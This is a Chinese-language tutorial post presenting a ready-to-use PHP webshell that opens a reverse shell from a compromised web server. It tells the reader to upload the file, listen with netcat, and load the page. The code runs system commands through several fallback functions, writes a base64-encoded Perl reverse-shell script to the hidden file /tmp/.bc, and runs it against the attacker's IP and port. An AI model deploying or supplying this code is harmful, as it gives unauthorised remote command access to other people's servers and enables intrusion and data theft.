PHP Webshell 下的端口反弹方法


    使用方法:需要将以下代码保存为一个单独的php文件。上传到服务器之后,本地NC监听一个端口,在代码里设置好反弹IP和端口,然后直接访问上传的php文件,就会给 NC 弹回来一个shell。
     测试实例:先在本地执行 nc -vv -l -p port,然后访问这个php页面 http://www.site.com/phpdkft.php ,本地就会得到一个反弹的shell。 
    
    
    这样每次可以直接访问这个php页面,直接弹回来shell,不用做其他繁琐的操作,下面贴出来已经修改好的代码
    复制代码
    代码如下:
    
    <?php
    function which($pr) {
    $path = execute("which $pr");
    return ($path ? $path : $pr);
    }
    function execute($cfe) {
    $res = '';
    if ($cfe) {
    if(function_exists('exec')) {
    @exec($cfe,$res);
    $res = join("\n",$res);
    } elseif(function_exists('shell_exec')) {
    $res = @shell_exec($cfe);
    } elseif(function_exists('system')) {
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    } elseif(function_exists('passthru')) {
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    } elseif(@is_resource($f = @popen($cfe,"r"))) {
    $res = '';
    while(!@feof($f)) {
    $res .= @fread($f,1024);
    }
    @pclose($f);
    }
    }
    return $res;
    }
    function cf($fname,$text){
    if($fp=@fopen($fname,'w')) {
    @fputs($fp,@base64_decode($text));
    @fclose($fp);
    }
    }
    $yourip = "your IP";
    $yourport = 'your port';
    $usedb = array('perl'=>'perl','c'=>'c');
    $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
    "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
    "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
    "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
    "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
    "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
    "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
    cf('/tmp/.bc',$back_connect);
    $res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
    ?>